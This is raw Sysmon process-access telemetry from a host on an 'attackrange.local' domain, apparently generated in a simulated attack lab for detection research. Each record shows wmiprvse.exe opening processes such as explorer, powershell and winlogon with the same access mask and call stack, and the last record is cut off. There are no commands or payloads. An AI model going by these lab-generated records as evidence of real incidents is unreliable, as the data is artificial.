10341000x800000000000000027734Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027733Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027732Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027731Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027730Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027729Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027728Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027727Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027726Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027725Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027724Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027723Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027722Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027721Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027720Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027719Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027718Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027717Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027716Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027715Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027714Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 